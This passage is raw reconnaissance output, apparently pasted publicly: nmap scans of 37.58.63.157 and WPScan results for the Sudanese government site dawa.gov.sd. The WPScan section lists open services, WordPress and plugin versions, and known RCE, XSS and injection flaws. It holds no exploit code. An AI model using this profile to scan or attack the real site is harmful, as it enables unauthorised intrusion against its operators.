2597. | EQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdTZWF0dGxlMQ0wCwYDVQQKEwRP
2598. | ZGluMQ4wDAYDVQQLEwVQbGVzazEOMAwGA1UEAxMFUGxlc2sxHTAbBgkqhkiG9w0B
2599. | CQEWDmluZm9AcGxlc2suY29tMB4XDTE3MDEyNTE1MDAxN1oXDTE4MDEyNTE1MDAx
2600. | N1owgYIxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQH
2601. | EwdTZWF0dGxlMQ0wCwYDVQQKEwRPZGluMQ4wDAYDVQQLEwVQbGVzazEOMAwGA1UE
2602. | AxMFUGxlc2sxHTAbBgkqhkiG9w0BCQEWDmluZm9AcGxlc2suY29tMIIBIjANBgkq
2603. | hkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAsgqGE79DYVskIABCTNthDwmF7wIWleuy
2604. | K1kblrhSIxIg/Qbgw7JUi8x9aoWssgdSilIU6+JR7uAOQE7rk3n9d+NWG9yTB+yP
2605. | aFUdSBID3sbQH0DdSuN4MSsSU2uroQhTQBelPaJMJKpwGutsbxcbQ8DhEjCZZhgk
2606. | P4yrn4fOW+ipblP3Np76Jr5A5WIbCew/D7Y4PfJsVyEbh5i0PipN2m/6qbZCNy8n
2607. | paTpdJkWYW6gYSC7pfxyYPBJF60ksNkwxHwWODhNepBo3nOQDWgkQmC2SW7EwjvP
2608. | pZoFbKE04HZYYl94h/sscPDN7YpzUQq5/EzK+2rOM6WPRmqzwf/4QQIDAQABMA0G
2609. | CSqGSIb3DQEBCwUAA4IBAQBuqJKULbN/7H64/LEJJcuhQNy6k3EZ6t0u53H27Nbe
2610. | IgUY6wFcg4a92sMmAVxWKdPZIq5evfvhHDhnOU3JgvsJUGsqpd+2+b1TJP5SA9vB
2611. | KQ/7r4TPSetXJDDiS/j+GoyM9c8vrnWvAep0D9d8MOzp1hXgP2/5OAfHcUrHOStB
2612. | PRhKAaChSpekNPnTVimV8kyuXLxgZjjIa+fsTU1/MkdEFNKoyVmeZEg63uuVGeiW
2613. | 3OfaSMidBm9bvqoXdx7YjOo0F+MDJe6iInNF9uYLEZuigBCz2iNw7fzrzNiaGFrP
2614. | bU78zeLMnXyzs4090UBAKGPsc3lknr6s3B+2V1+MJFyg
2615. |_-----END CERTIFICATE-----
2616. |_ssl-date: TLS randomness does not represent time
2617. 3306/tcp open mysql syn-ack MySQL 5.5.60-MariaDB
2618. | mysql-info:
2619. | Protocol: 10
2620. | Version: 5.5.60-MariaDB
2621. | Thread ID: 13774
2622. | Capabilities flags: 63487
2623. | Some Capabilities: Speaks41ProtocolOld, Support41Auth, SupportsLoadDataLocal, IgnoreSpaceBeforeParenthesis, LongColumnFlag, LongPassword, InteractiveClient, IgnoreSigpipes, Speaks41ProtocolNew, SupportsTransactions, FoundRows, ConnectWithDatabase, DontAllowDatabaseTableColumn, ODBCClient, SupportsCompression, SupportsMultipleStatments, SupportsAuthPlugins, SupportsMultipleResults
2624. | Status: Autocommit
2625. | Salt: HyJF`0nXPi=79Z9N\ecD
2626. |_ Auth Plugin Name: 87
2627. 4190/tcp open sieve syn-ack Dovecot Pigeonhole sieve 1.0
2628. 7080/tcp open http syn-ack Apache httpd
2629. |_http-favicon: Unknown favicon MD5: D41D8CD98F00B204E9800998ECF8427E
2630. |_http-generator: WordPress 5.0.4
2631. | http-methods:
2632. |_ Supported Methods: GET HEAD POST OPTIONS
2633. | http-robots.txt: 1 disallowed entry
2634. |_/wp-admin/
2635. |_http-server-header: Apache
2636. |_http-title: \xD8\xA7\xD9\x84\xD9\x85\xD8\xAC\xD9\x84\xD8\xB3 \xD8\xA7\xD9\x84\xD8\xA3\xD8\xB9\xD9\x84\xD9\x89 \xD9\x84\xD9\x84\xD8\xAF\xD8\xB9\xD9\x88\xD8\xA9 \xD9\x88\xD8\xA7\xD9\x84\xD8\xA5\xD8\xB1\xD8\xB4\xD8\xA7\xD8\xAF
2637. 7081/tcp open http syn-ack Apache httpd
2638. | http-methods:
2639. |_ Supported Methods: GET HEAD POST
2640. |_http-server-header: Apache
2641. |_http-title: 400 Bad Request
2642. 8443/tcp open ssl/http syn-ack sw-cp-server httpd (Plesk Onyx 17.8.11)
2643. |_http-favicon: Unknown favicon MD5: 1DB747255C64A30F9236E9D929E986CA
2644. | http-methods:
2645. |_ Supported Methods: GET HEAD POST
2646. |_http-server-header: sw-cp-server
2647. |_http-title: Plesk Onyx 17.8.11
2648. | ssl-cert: Subject: commonName=Plesk/organizationName=Odin/stateOrProvinceName=Washington/countryName=US/organizationalUnitName=Plesk/emailAddress=info@plesk.com/localityName=Seattle
2649. | Issuer: commonName=Plesk/organizationName=Odin/stateOrProvinceName=Washington/countryName=US/organizationalUnitName=Plesk/emailAddress=info@plesk.com/localityName=Seattle
2650. | Public Key type: rsa
2651. | Public Key bits: 2048
2652. | Signature Algorithm: sha256WithRSAEncryption
2653. | Not valid before: 2017-01-25T15:00:17
2654. | Not valid after: 2018-01-25T15:00:17
2655. | MD5: f72c c3dc 17bd 5d9a f097 4554 8548 0b61
2656. | SHA-1: 68a7 f4fb 70d5 1efa 24ee 5932 8433 549f 77fb a038
2657. | -----BEGIN CERTIFICATE-----
2658. | MIIDfTCCAmUCBFiIvYEwDQYJKoZIhvcNAQELBQAwgYIxCzAJBgNVBAYTAlVTMRMw
2659. | EQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdTZWF0dGxlMQ0wCwYDVQQKEwRP
2660. | ZGluMQ4wDAYDVQQLEwVQbGVzazEOMAwGA1UEAxMFUGxlc2sxHTAbBgkqhkiG9w0B
2661. | CQEWDmluZm9AcGxlc2suY29tMB4XDTE3MDEyNTE1MDAxN1oXDTE4MDEyNTE1MDAx
2662. | N1owgYIxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQH
2663. | EwdTZWF0dGxlMQ0wCwYDVQQKEwRPZGluMQ4wDAYDVQQLEwVQbGVzazEOMAwGA1UE
2664. | AxMFUGxlc2sxHTAbBgkqhkiG9w0BCQEWDmluZm9AcGxlc2suY29tMIIBIjANBgkq
2665. | hkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAsgqGE79DYVskIABCTNthDwmF7wIWleuy
2666. | K1kblrhSIxIg/Qbgw7JUi8x9aoWssgdSilIU6+JR7uAOQE7rk3n9d+NWG9yTB+yP
2667. | aFUdSBID3sbQH0DdSuN4MSsSU2uroQhTQBelPaJMJKpwGutsbxcbQ8DhEjCZZhgk
2668. | P4yrn4fOW+ipblP3Np76Jr5A5WIbCew/D7Y4PfJsVyEbh5i0PipN2m/6qbZCNy8n
2669. | paTpdJkWYW6gYSC7pfxyYPBJF60ksNkwxHwWODhNepBo3nOQDWgkQmC2SW7EwjvP
2670. | pZoFbKE04HZYYl94h/sscPDN7YpzUQq5/EzK+2rOM6WPRmqzwf/4QQIDAQABMA0G
2671. | CSqGSIb3DQEBCwUAA4IBAQBuqJKULbN/7H64/LEJJcuhQNy6k3EZ6t0u53H27Nbe
2672. | IgUY6wFcg4a92sMmAVxWKdPZIq5evfvhHDhnOU3JgvsJUGsqpd+2+b1TJP5SA9vB
2673. | KQ/7r4TPSetXJDDiS/j+GoyM9c8vrnWvAep0D9d8MOzp1hXgP2/5OAfHcUrHOStB
2674. | PRhKAaChSpekNPnTVimV8kyuXLxgZjjIa+fsTU1/MkdEFNKoyVmeZEg63uuVGeiW
2675. | 3OfaSMidBm9bvqoXdx7YjOo0F+MDJe6iInNF9uYLEZuigBCz2iNw7fzrzNiaGFrP
2676. | bU78zeLMnXyzs4090UBAKGPsc3lknr6s3B+2V1+MJFyg
2677. |_-----END CERTIFICATE-----
2678. |_ssl-date: TLS randomness does not represent time
2679. | tls-nextprotoneg:
2680. |_ http/1.1
2681. 8880/tcp open http syn-ack sw-cp-server httpd (Plesk Onyx 17.8.11)
2682. |_http-favicon: Unknown favicon MD5: 1DB747255C64A30F9236E9D929E986CA
2683. | http-methods:
2684. |_ Supported Methods: GET HEAD POST
2685. | http-robots.txt: 1 disallowed entry
2686. |_/
2687. |_http-server-header: sw-cp-server
2688. |_http-title: Plesk Onyx 17.8.11
2689. 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
2690. SF-Port53-TCP:V=7.70%I=7%D=5/2%Time=5CCAD917%P=x86_64-pc-linux-gnu%r(DNSVe
2691. SF:rsionBindReqTCP,3F,"\0=\0\x06\x85\0\0\x01\0\x01\0\x01\0\0\x07version\x0
2692. SF:4bind\0\0\x10\0\x03\xc0\x0c\0\x10\0\x03\0\0\0\0\0\x05\x04none\xc0\x0c\0
2693. SF:\x02\0\x03\0\0\0\0\0\x02\xc0\x0c");
2694. OS fingerprint not ideal because: Host distance (14 network hops) is greater than five
2695. Aggressive OS guesses: Linux 3.10 - 4.11 (95%), HP P2000 G3 NAS device (93%), Linux 3.2 - 4.9 (92%), Linux 3.13 (92%), Linux 3.13 or 4.2 (92%), Linux 3.16 - 4.6 (92%), Linux 4.1 (92%), Linux 4.10 (92%), Linux 4.2 (92%), Linux 4.4 (92%)
2696. No exact OS matches for host (test conditions non-ideal).
2697. TCP/IP fingerprint:
2698. SCAN(V=7.70%E=4%D=5/2%OT=21%CT=1%CU=42219%PV=N%DS=14%DC=T%G=N%TM=5CCAD97F%P=x86_64-pc-linux-gnu)
2699. SEQ(SP=102%GCD=1%ISR=10B%TI=Z%TS=A)
2700. OPS(O1=M44FST11NW7%O2=M44FST11NW7%O3=M44FNNT11NW7%O4=M44FST11NW7%O5=M44FST11NW7%O6=M44FST11)
2701. WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)
2702. ECN(R=Y%DF=Y%T=3F%W=7210%O=M44FNNSNW7%CC=Y%Q=)
2703. T1(R=Y%DF=Y%T=3F%S=O%A=S+%F=AS%RD=0%Q=)
2704. T2(R=N)
2705. T3(R=N)
2706. T4(R=Y%DF=Y%T=3F%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)
2707. T5(R=Y%DF=Y%T=3F%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
2708. T6(R=Y%DF=Y%T=3F%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)
2709. T7(R=N)
2710. U1(R=Y%DF=N%T=3F%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)
2711. IE(R=Y%DFI=N%T=3F%CD=S)
2712.  
2713. Uptime guess: 8.259 days (since Wed Apr 24 01:37:05 2019)
2714. Network Distance: 14 hops
2715. TCP Sequence Prediction: Difficulty=258 (Good luck!)
2716. IP ID Sequence Generation: All zeros
2717. Service Info: Host: server.sdserverweb
2718.  
2719. TRACEROUTE (using proto 1/icmp)
2720. HOP RTT ADDRESS
2721. 1 20.73 ms 10.246.200.1
2722. 2 20.93 ms vlan102.as02.qc1.ca.m247.com (176.113.74.17)
2723. 3 37.90 ms xe-0-0-1-0.agg2.qc1.ca.m247.com (37.120.128.166)
2724. 4 23.20 ms vlan304.as032.buc.ro.m247.com (77.243.185.226)
2725. 5 20.90 ms motl-b1-link.telia.net (62.115.162.41)
2726. 6 ...
2727. 7 118.37 ms ldn-bb4-link.telia.net (62.115.112.245)
2728. 8 125.74 ms prs-bb4-link.telia.net (62.115.114.229)
2729. 9 118.38 ms ffm-bb4-link.telia.net (62.115.114.99)
2730. 10 118.41 ms ffm-b10-link.telia.net (62.115.137.211)
2731. 11 113.14 ms leaseweb-ic-146205-ffm-b10.c.telia.net (80.239.132.74)
2732. 12 112.57 ms po-7.ce02.fra-10.de.leaseweb.net (178.162.223.159)
2733. 13 115.97 ms hosted-by.leaseweb.com (46.165.226.255)
2734. 14 112.63 ms 37.58.63.157
2735.  
2736. NSE: Script Post-scanning.
2737. NSE: Starting runlevel 1 (of 2) scan.
2738. Initiating NSE at 07:50
2739. Completed NSE at 07:50, 0.00s elapsed
2740. NSE: Starting runlevel 2 (of 2) scan.
2741. Initiating NSE at 07:50
2742. Completed NSE at 07:50, 0.00s elapsed
2743. Read data files from: /usr/bin/../share/nmap
2744. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
2745. Nmap done: 1 IP address (1 host up) scanned in 465.86 seconds
2746. Raw packets sent: 83 (5.762KB) | Rcvd: 451 (258.086KB)
2747. #######################################################################################################################################
2748. Starting Nmap 7.70 ( https://nmap.org ) at 2019-05-02 07:50 EDT
2749. NSE: Loaded 148 scripts for scanning.
2750. NSE: Script Pre-scanning.
2751. Initiating NSE at 07:50
2752. Completed NSE at 07:50, 0.00s elapsed
2753. Initiating NSE at 07:50
2754. Completed NSE at 07:50, 0.00s elapsed
2755. Initiating Parallel DNS resolution of 1 host. at 07:50
2756. Completed Parallel DNS resolution of 1 host. at 07:50, 0.03s elapsed
2757. Initiating UDP Scan at 07:50
2758. Scanning 37.58.63.157 [14 ports]
2759. Discovered open port 53/udp on 37.58.63.157
2760. Completed UDP Scan at 07:50, 5.56s elapsed (14 total ports)
2761. Initiating Service scan at 07:50
2762. Scanning 3 services on 37.58.63.157
2763. Service scan Timing: About 66.67% done; ETC: 07:52 (0:00:49 remaining)
2764. Completed Service scan at 07:52, 97.58s elapsed (3 services on 1 host)
2765. Initiating OS detection (try #1) against 37.58.63.157
2766. Retrying OS detection (try #2) against 37.58.63.157
2767. Initiating Traceroute at 07:52
2768. Completed Traceroute at 07:52, 7.08s elapsed
2769. Initiating Parallel DNS resolution of 1 host. at 07:52
2770. Completed Parallel DNS resolution of 1 host. at 07:52, 0.01s elapsed
2771. NSE: Script scanning 37.58.63.157.
2772. Initiating NSE at 07:52
2773. Completed NSE at 07:52, 0.30s elapsed
2774. Initiating NSE at 07:52
2775. Completed NSE at 07:52, 1.01s elapsed
2776. Nmap scan report for 37.58.63.157
2777. Host is up (0.12s latency).
2778.  
2779. PORT STATE SERVICE VERSION
2780. 53/udp open domain (unknown banner: none)
2781. | dns-nsid:
2782. |_ bind.version: none
2783. | fingerprint-strings:
2784. | DNSVersionBindReq:
2785. | version
2786. | bind
2787. | none
2788. | NBTStat:
2789. |_ CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2790. 67/udp closed dhcps
2791. 68/udp open|filtered dhcpc
2792. 69/udp closed tftp
2793. 88/udp closed kerberos-sec
2794. 123/udp closed ntp
2795. 137/udp filtered netbios-ns
2796. 138/udp filtered netbios-dgm
2797. 139/udp open|filtered netbios-ssn
2798. 161/udp closed snmp
2799. 162/udp closed snmptrap
2800. 389/udp closed ldap
2801. 520/udp closed route
2802. 2049/udp closed nfs
2803. 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
2804. SF-Port53-UDP:V=7.70%I=7%D=5/2%Time=5CCAD98A%P=x86_64-pc-linux-gnu%r(DNSVe
2805. SF:rsionBindReq,3D,"\0\x06\x85\0\0\x01\0\x01\0\x01\0\0\x07version\x04bind\
2806. SF:0\0\x10\0\x03\xc0\x0c\0\x10\0\x03\0\0\0\0\0\x05\x04none\xc0\x0c\0\x02\0
2807. SF:\x03\0\0\0\0\0\x02\xc0\x0c")%r(DNSStatusRequest,C,"\0\0\x90\x04\0\0\0\0
2808. SF:\0\0\0\0")%r(NBTStat,32,"\x80\xf0\x80\x15\0\x01\0\0\0\0\0\0\x20CKAAAAAA
2809. SF:AAAAAAAAAAAAAAAAAAAAAAAA\0\0!\0\x01");
2810. Too many fingerprints match this host to give specific OS details
2811. Network Distance: 14 hops
2812.  
2813. TRACEROUTE (using port 138/udp)
2814. HOP RTT ADDRESS
2815. 1 ... 4
2816. 5 22.60 ms 10.246.200.1
2817. 6 ... 7
2818. 8 21.21 ms 10.246.200.1
2819. 9 21.55 ms 10.246.200.1
2820. 10 21.54 ms 10.246.200.1
2821. 11 21.54 ms 10.246.200.1
2822. 12 21.54 ms 10.246.200.1
2823. 13 21.55 ms 10.246.200.1
2824. 14 21.57 ms 10.246.200.1
2825. 15 ... 18
2826. 19 24.33 ms 10.246.200.1
2827. 20 21.72 ms 10.246.200.1
2828. 21 ... 27
2829. 28 20.71 ms 10.246.200.1
2830. 29 ...
2831. 30 21.61 ms 10.246.200.1
2832.  
2833. NSE: Script Post-scanning.
2834. Initiating NSE at 07:52
2835. Completed NSE at 07:52, 0.00s elapsed
2836. Initiating NSE at 07:52
2837. Completed NSE at 07:52, 0.00s elapsed
2838. Read data files from: /usr/bin/../share/nmap
2839. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
2840. Nmap done: 1 IP address (1 host up) scanned in 116.02 seconds
2841. Raw packets sent: 119 (5.357KB) | Rcvd: 885 (309.722KB)
2842. #######################################################################################################################################
2843. [+] URL: http://dawa.gov.sd/
2844. [+] Started: Thu May 2 06:19:10 2019
2845.  
2846. Interesting Finding(s):
2847.  
2848. [+] http://dawa.gov.sd/
2849. | Interesting Entries:
2850. | - X-Powered-By: PHP/7.0.33, PleskLin
2851. | - X-Cache-Status: STALE
2852. | Found By: Headers (Passive Detection)
2853. | Confidence: 100%
2854.  
2855. [+] WordPress version 5.0.4 identified (Latest, released on 2019-03-13).
2856. | Detected By: Emoji Settings (Passive Detection)
2857. | - http://dawa.gov.sd/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.0.4'
2858. | Confirmed By: Meta Generator (Passive Detection)
2859. | - http://dawa.gov.sd/, Match: 'WordPress 5.0.4'
2860.  
2861. [+] WordPress theme in use: dawa-child
2862. | Location: http://dawa.gov.sd/wp-content/themes/dawa-child/
2863. | Style URL: http://dawa.gov.sd/wp-content/themes/dawa-child/style.css?ver=12.5
2864. | Style Name: dawa Child
2865. | Style URI: http://#
2866. | Description: dawa...
2867. | Author: Gasim
2868. | Author URI: http://#
2869. |
2870. | Detected By: Css Style (Passive Detection)
2871. |
2872. | Version: 1.0 (80% confidence)
2873. | Detected By: Style (Passive Detection)
2874. | - http://dawa.gov.sd/wp-content/themes/dawa-child/style.css?ver=12.5, Match: 'Version: 1.0'
2875.  
2876. [+] Enumerating All Plugins (via Passive Methods)
2877. [+] Checking Plugin Versions (via Passive and Aggressive Methods)
2878.  
2879. [i] Plugin(s) Identified:
2880.  
2881. [+] js_composer
2882. | Location: http://dawa.gov.sd/wp-content/plugins/js_composer/
2883. |
2884. | Detected By: Urls In Homepage (Passive Detection)
2885. | Confirmed By:
2886. | Meta Generator (Passive Detection)
2887. | Body Tag (Passive Detection)
2888. |
2889. | Version: 4.11.1 (80% confidence)
2890. | Detected By: Query Parameter (Passive Detection)
2891. | - http://dawa.gov.sd/wp-content/plugins/js_composer/assets/css/js_composer.min.css?ver=4.11.1
2892. | - http://dawa.gov.sd/wp-content/plugins/js_composer/assets/js/dist/js_composer_front.min.js?ver=4.11.1
2893. | Confirmed By: Body Tag (Passive Detection)
2894. | - http://dawa.gov.sd/, Match: 'js-comp-ver-4.11.1'
2895.  
2896. [+] pw-vc-box-post-layout
2897. | Location: http://dawa.gov.sd/wp-content/plugins/pw-vc-box-post-layout/
2898. |
2899. | Detected By: Urls In Homepage (Passive Detection)
2900. |
2901. | The version could not be determined.
2902.  
2903. [+] pw-vc-news-ticker-post-layout
2904. | Location: http://dawa.gov.sd/wp-content/plugins/pw-vc-news-ticker-post-layout/
2905. |
2906. | Detected By: Urls In Homepage (Passive Detection)
2907. |
2908. | The version could not be determined.
2909.  
2910. [+] revslider
2911. | Location: http://dawa.gov.sd/wp-content/plugins/revslider/
2912. |
2913. | Detected By: Urls In Homepage (Passive Detection)
2914. | Confirmed By:
2915. | Comment (Passive Detection)
2916. | Div Data Version (Passive Detection)
2917. | Meta Generator (Passive Detection)
2918. |
2919. | Version: 5.2.3.5 (100% confidence)
2920. | Detected By: Meta Generator (Passive Detection)
2921. | - http://dawa.gov.sd/, Match: 'Powered by Slider Revolution 5.2.3.5'
2922. | Confirmed By: Comment (Passive Detection)
2923. | - http://dawa.gov.sd/, Match: 'START REVOLUTION SLIDER 5.2.3.5'
2924.  
2925. [+] Ultimate_VC_Addons
2926. | Location: http://dawa.gov.sd/wp-content/plugins/Ultimate_VC_Addons/
2927. |
2928. | Detected By: Urls In Homepage (Passive Detection)
2929. |
2930. | [!] 1 vulnerability identified:
2931. |
2932. | [!] Title: Ultimate Addons for Visual Composer <= 3.16.11 - Authenticated XSS, CSRF, RCE
2933. | Fixed in: 3.16.12
2934. | References:
2935. | - https://wpvulndb.com/vulnerabilities/8821
2936. | - http://wphutte.com/ultimate-addons-for-visual-composer-v3-16-10-xss-csrf-rce/
2937. | - https://codecanyon.net/item/ultimate-addons-for-visual-composer/6892199
2938. |
2939. | The version could not be determined.
2940.  
2941. [+] vc-extensions-bundle
2942. | Location: http://dawa.gov.sd/wp-content/plugins/vc-extensions-bundle/
2943. |
2944. | Detected By: Urls In Homepage (Passive Detection)
2945. |
2946. | The version could not be determined.
2947.  
2948. [+] wordfence
2949. | Location: http://dawa.gov.sd/wp-content/plugins/wordfence/
2950. | Latest Version: 7.2.5
2951. | Last Updated: 2019-04-18T15:48:00.000Z
2952. |
2953. | Detected By: Javascript Var (Passive Detection)
2954. |
2955. | [!] 12 vulnerabilities identified:
2956. |
2957. | [!] Title: Wordfence 3.8.6 - lib/IPTraf.php User-Agent Header Stored XSS
2958. | Fixed in: 3.8.7
2959. | References:
2960. | - https://wpvulndb.com/vulnerabilities/6140
2961. | - https://secunia.com/advisories/56558/
2962. |
2963. | [!] Title: Wordfence 3.8.1 - Password Creation Restriction Bypass
2964. | Fixed in: 3.8.3
2965. | Reference: https://wpvulndb.com/vulnerabilities/6141
2966. |
2967. | [!] Title: Wordfence 3.8.1 - wp-admin/admin.php whois Parameter Stored XSS
2968. | Fixed in: 3.8.3
2969. | References:
2970. | - https://wpvulndb.com/vulnerabilities/6142
2971. | - http://packetstormsecurity.com/files/122993/
2972. | - http://www.securityfocus.com/bid/62053/
2973. |
2974. | [!] Title: Wordfence 3.3.5 - XSS & IAA
2975. | Fixed in: 3.3.7
2976. | References:
2977. | - https://wpvulndb.com/vulnerabilities/6143
2978. | - https://secunia.com/advisories/51055/
2979. | - http://seclists.org/fulldisclosure/2012/Oct/139
2980. |
2981. | [!] Title: Wordfence 5.2.4 - Unspecified Issue
2982. | Fixed in: 5.2.5
2983. | Reference: https://wpvulndb.com/vulnerabilities/7581
2984. |
2985. | [!] Title: Wordfence 5.2.4 - IPTraf.php URI Request Stored XSS
2986. | Fixed in: 5.2.5
2987. | References:
2988. | - https://wpvulndb.com/vulnerabilities/7582
2989. | - http://packetstormsecurity.com/files/128259/
2990. |
2991. | [!] Title: Wordfence 5.2.3 - Banned IP Functionality Bypass
2992. | Fixed in: 5.2.4
2993. | References:
2994. | - https://wpvulndb.com/vulnerabilities/7583
2995. | - http://packetstormsecurity.com/files/128259/
2996. | - http://seclists.org/fulldisclosure/2014/Sep/49
2997. | - https://vexatioustendencies.com/wordfence-v5-2-3-2-stored-xss-insufficient-logging-throttle-bypass-exploit-detection-bypass/
2998. |
2999. | [!] Title: Wordfence 5.2.3 - Multiple Vulnerabilities
3000. | Fixed in: 5.2.4
3001. | References:
3002. | - https://wpvulndb.com/vulnerabilities/7612
3003. | - https://vexatioustendencies.com/wordfence-v5-2-3-2-stored-xss-insufficient-logging-throttle-bypass-exploit-detection-bypass/
3004. |
3005. | [!] Title: Wordfence <= 5.2.4 - Multiple Vulnerabilities (XSS & Bypasses)
3006. | Fixed in: 5.2.5
3007. | References:
3008. | - https://wpvulndb.com/vulnerabilities/7636
3009. | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4664
3010. | - https://secupress.me/blog/wordfence-5-2-5-security-update/
3011. | - http://www.securityfocus.com/bid/70915/
3012. |
3013. | [!] Title: Wordfence 5.2.2 - XSS in Referer Header
3014. | Fixed in: 5.2.3
3015. | References:
3016. | - https://wpvulndb.com/vulnerabilities/7698
3017. | - https://vexatioustendencies.com/wordpress-plugin-vulnerability-dump-part-2/
3018. |
3019. | [!] Title: Wordfence <= 5.1.4 - Cross-Site Scripting (XSS)
3020. | Fixed in: 5.1.5
3021. | References:
3022. | - https://wpvulndb.com/vulnerabilities/7711
3023. | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4932
3024. |
3025. | [!] Title: Wordfence <= 7.1.12 - Username Enumeration Prevention Bypass
3026. | Fixed in: 7.1.14
3027. | References:
3028. | - https://wpvulndb.com/vulnerabilities/9135
3029. | - http://www.waraxe.us/advisory-109.html
3030. | - http://packetstormsecurity.com/files/149845/
3031. |
3032. | The version could not be determined.
3033.  
3034. [+] wp-super-cache
3035. | Location: http://dawa.gov.sd/wp-content/plugins/wp-super-cache/
3036. | Latest Version: 1.6.4
3037. | Last Updated: 2018-12-20T09:36:00.000Z
3038. |
3039. | Detected By: Comment (Passive Detection)
3040. |
3041. | [!] 10 vulnerabilities identified:
3042. |
3043. | [!] Title: WP-Super-Cache 1.3 - Remote Code Execution
3044. | Fixed in: 1.3.1
3045. | References:
3046. | - https://wpvulndb.com/vulnerabilities/6623
3047. | - http://www.acunetix.com/blog/web-security-zone/wp-plugins-remote-code-execution/
3048. | - http://wordpress.org/support/topic/pwn3d
3049. | - http://blog.sucuri.net/2013/04/update-wp-super-cache-and-w3tc-immediately-remote-code-execution-vulnerability-disclosed.html
3050. |
3051. | [!] Title: WP Super Cache 1.3 - trunk/wp-cache.php wp_nonce_url Function URI XSS
3052. | Fixed in: 1.3.1
3053. | References:
3054. | - https://wpvulndb.com/vulnerabilities/6624
3055. | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2008
3056. |
3057. | [!] Title: WP Super Cache 1.3 - trunk/plugins/wptouch.php URI XSS
3058. | Fixed in: 1.3.1
3059. | References:
3060. | - https://wpvulndb.com/vulnerabilities/6625
3061. | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2008
3062. |
3063. | [!] Title: WP Super Cache 1.3 - trunk/plugins/searchengine.php URI XSS
3064. | Fixed in: 1.3.1
3065. | References:
3066. | - https://wpvulndb.com/vulnerabilities/6626
3067. | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2008
3068. |
3069. | [!] Title: WP Super Cache 1.3 - trunk/plugins/domain-mapping.php URI XSS
3070. | Fixed in: 1.3.1
3071. | References:
3072. | - https://wpvulndb.com/vulnerabilities/6627
3073. | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2008
3074. |
3075. | [!] Title: WP Super Cache 1.3 - trunk/plugins/badbehaviour.php URI XSS
3076. | Fixed in: 1.3.1
3077. | References:
3078. | - https://wpvulndb.com/vulnerabilities/6628
3079. | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2008
3080. |
3081. | [!] Title: WP Super Cache 1.3 - trunk/plugins/awaitingmoderation.php URI XSS
3082. | Fixed in: 1.3.1
3083. | References:
3084. | - https://wpvulndb.com/vulnerabilities/6629
3085. | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2008
3086. |
3087. | [!] Title: WP Super Cache <= 1.4.2 - Stored Cross-Site Scripting (XSS)
3088. | Fixed in: 1.4.3
3089. | References:
3090. | - https://wpvulndb.com/vulnerabilities/7889
3091. | - http://blog.sucuri.net/2015/04/security-advisory-persistent-xss-in-wp-super-cache.html
3092. |
3093. | [!] Title: WP Super Cache <= 1.4.4 - Cross-Site Scripting (XSS)
3094. | Fixed in: 1.4.5
3095. | References:
3096. | - https://wpvulndb.com/vulnerabilities/8197
3097. | - http://z9.io/2015/09/25/wp-super-cache-1-4-5/
3098. |
3099. | [!] Title: WP Super Cache <= 1.4.4 - PHP Object Injection
3100. | Fixed in: 1.4.5
3101. | References:
3102. | - https://wpvulndb.com/vulnerabilities/8198
3103. | - http://z9.io/2015/09/25/wp-super-cache-1-4-5/
3104. |
3105. | The version could not be determined.
3106.  
3107. [+] Enumerating Config Backups (via Passive and Aggressive Methods)
3108. Checking Config Backups - Time: 00:00:01 <=============> (21 / 21) 100.00% Time: 00:00:01
3109.  
3110. [i] No Config Backups Found.
3111.  
3112.  
3113. [+] Finished: Thu May 2 06:19:44 2019
3114. [+] Requests Done: 94
3115. [+] Cached Requests: 5
3116. [+] Data Sent: 14.951 KB
3117. [+] Data Received: 274.581 KB
3118. [+] Memory used: 153.277 MB
3119. [+] Elapsed time: 00:00:33
3120. #######################################################################################################################################
3121. [+] URL: http://dawa.gov.sd/
3122. [+] Started: Thu May 2 06:19:14 2019
3123.  
3124. Interesting Finding(s):
3125.  
3126. [+] http://dawa.gov.sd/
3127. | Interesting Entries:
3128. | - X-Powered-By: PHP/7.0.33, PleskLin
3129. | - X-Cache-Status: STALE
3130. | Found By: Headers (Passive Detection)
3131. | Confidence: 100%
3132.  
3133. [+] WordPress version 5.0.4 identified (Latest, released on 2019-03-13).
3134. | Detected By: Emoji Settings (Passive Detection)
3135. | - http://dawa.gov.sd/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.0.4'
3136. | Confirmed By: Meta Generator (Passive Detection)
3137. | - http://dawa.gov.sd/, Match: 'WordPress 5.0.4'
3138.  
3139. [+] WordPress theme in use: dawa-child
3140. | Location: http://dawa.gov.sd/wp-content/themes/dawa-child/
3141. | Style URL: http://dawa.gov.sd/wp-content/themes/dawa-child/style.css?ver=12.5
3142. | Style Name: dawa Child
3143. | Style URI: http://#
3144. | Description: dawa...
3145. | Author: Gasim
3146. | Author URI: http://#
3147. |
3148. | Detected By: Css Style (Passive Detection)
3149. |
3150. | Version: 1.0 (80% confidence)
3151. | Detected By: Style (Passive Detection)
